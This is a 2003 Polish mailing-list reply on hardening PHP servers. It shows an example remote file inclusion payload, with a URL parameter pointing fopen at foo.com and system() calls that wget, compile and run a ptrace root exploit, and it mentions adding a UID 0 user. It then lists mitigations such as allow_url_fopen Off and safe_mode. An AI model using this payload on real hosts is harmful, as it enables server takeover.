Witam, Dnia nie, kwi 27, 2003 at 01:39:30 CEST, Mirek Grochowski napisał: : > : Napisz tylko jakie masz jajko i ilu masz userow z dostepem do shella. : > A po cholere mi shell? : Bo w zwiazku z ostatnia dziura latwo bylo uzyskac UID 0, a to juz paskudna : sprawa. A po ch*j mi do tego shell? Robiac przez bledy w php'ie ten sam efekt zrobie. Ktorys z exploitow do ptrace mial mozliwosc, ze jako argument podawalo sie np. skrypt w sh ktory dodawal uzytkownika do systemu z uid 0.. Potem sie loguje via ssh i mam juz shella. Wychodzenie z zalozenia, ze wlamac sie mona tylko z shella jest bledem. Dobra zasada paranoika: _WSZYSTKO_ jest potencajlnie exploitowalne. Przydaje sie ;). : Moglbys troche rozwinac temat? Nie chodzi mi o .*Nuke ale ogolnie o co : chodzi w fopen? Juz skasowalem raport w ktorym mialem to opisane. ale mniej wiecej: na stronie jest sobie fopen($filename.$prefix) wejscie na strone &filename=http://foo.com/exploit&prefix=txt a w pliku na http://foo.com/exploit.txt: system("uname -a"); system("wget http://foo.com/ptrace.c"); system("gcc -o /tmp/str ptrace.c"); system("/tmp/str"); Proste co? Zapobieganie: - blokada fopen na zewnatrz (czyli wsio co ma ftp://, http:// inne_protokoly://). [allow_url_fopen = Off] - blokada wywolywania system(); [safe_mode = On] (choc prawde powiedziawszy std safe_mode to troche malo... znam pewna firme ktora tak podkrecila safe_mode, ze user moze uzywac w phpie tylko kilkanascie podstatowych mozliwosci) Ogolnie wszyscy zalecaja uzywanie php'a w chlapaczu jako ExecCGI (mod_php: jeden Vhost moze nadpisywac pliki drugiego VHosta - poprostu wszystrko lata na jednych prawach). : Wlasciwie to zwlaszcza o metode zapobiegawcza :)) ~ # head -n 13 /etc/php4/apache/php.ini [PHP] ;;;;;;;;;;; ; WARNING ; ;;;;;;;;;;; ; This is the default settings file for new PHP installations. ; By default, PHP installs itself with a configuration suitable for ; development purposes, and *NOT* for production purposes. ; For several security-oriented considerations that should be taken ; before going online with your site, please consult php.ini-recommended ; and http://php.net/manual/en/security.php. Pozdrawiam, Tomasz T. Ciaszczyk -- .: ciacho<at>ciacho.pl ciacho<at>jabber.org http://ciacho.pl :. .: Ziemia nie jest bąkiem swobodnym - tu Himalaje, tam jakiś :. .: Rów Mariański... :. .: -- prof. Jacek Własak :.
Attachment:
pgp2oMSfscpJw.pgp
Description: PGP signature